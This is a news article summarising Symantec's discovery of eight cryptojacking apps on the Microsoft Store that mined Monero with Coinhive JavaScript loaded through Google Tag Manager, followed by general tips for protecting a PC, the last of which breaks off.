8 Cryptojacking Apps Are Found on Microsoft Store by Symantec

Symantec Finds Cryptojacking Apps

On February 15, 2019, the cyber security company, Symantec published a blog on its website and described that it discovered several potentially unwanted applications (PUAs) on Microsoft Store which used the victim’s CPU power to mine cryptocurrency.

The eight apps were Fast-search Lite, Clean Master+ (Tutorials), Battery Optimizer (Tutorials), FastTube, VPN Browsers+, Findoo Browser 2019, Downloader for YouTube Videos, and Findoo Mobile & Desktop Search.

And users can know the introduction of these apps through the top apps lists on Microsoft Store or via keyword search. And Symantec discovered they could run on Windows 10, as well as Windows 10 S Mode.

Actually, this firm has found these apps on January 17 and reported this thing to Microsoft. Although Microsoft didn’t respond to the company directly, it removed them from the Store app subsequently.

According to Symantec, these applications were published between the months of April and December in 2018 and a majority of them were published towards the end of the year. Although the apps were on the Microsoft Store for a relatively short period of time, a number of users may have downloaded them.

Currently, it isn’t clear to get the exact download and installation counts, but they had almost 1,900 user ratings, which means at least thousands of devices may have been infected.

How Cryptojacking Apps on Microsoft Store Work

In Symantec blog, this company introduced how these apps worked. As soon as users downloaded and launched the apps, they would fetch a coin-mining JavaScript library by triggering Google Tag Manager in their domain servers. Then, the mining script was activated and started using the majority of the PC’s CPU cycles to mine Monero for the operators.

It is reported that Symantec has told Microsoft and Google about the behaviors of these applications. Microsoft has removed the apps from the store and Google has also deleted the mining JavaScript from Google Tag Manager.

All of these apps offered privacy policies but the description of the coin mining on the app store wasn’t mentioned. According to the Symantec’s analysis, the strain of mining malware enclosed in these applications was Coinhive mining code that was based on the web browser.

These apps are used for internet search, video viewing and download, web browsers, computer and battery optimization tutorial. And they came from 3 developers including 1clean, Findoo and DigiDream. After further investigation, Symantec found these apps had been developed by the same person or group, in spite of the different names.

How to Protect PC from Online Threats

In the Symantec blog about the topic cryptojacking apps on Microsoft Store, this company also offered some suggestions on how to protect the computer from online threats and risks. Next, let’s go to the precautions.

Related article: Ransomware Prevention Policy, Protect Yourself Now!

1. Keep software up-to-date.
2. Only install apps from a trusted website and don’t download them from unfamiliar sites.
3. Pay much attention to CPU and memory usage of the computer or device.
4. Concern the permissions required by apps.
5. Install a suitable antivirus program like Norton on the PC to protect it.
6. Above all, the most important thing is to make regular backups for important